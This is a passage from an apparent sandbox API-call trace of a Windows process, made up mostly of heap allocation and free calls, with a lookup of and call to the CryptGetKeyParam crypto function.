(HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.593] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb5a8 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ada8 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.594] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.595] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.595] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.596] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.596] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.596] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.597] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.597] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e018 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.598] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.598] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.599] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.599] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.599] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.599] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.599] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.599] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.600] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.601] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.602] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.602] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.602] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.602] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.602] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9708, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.603] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.604] CryptGetKeyParam (in: hKey=0x6b8b78, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 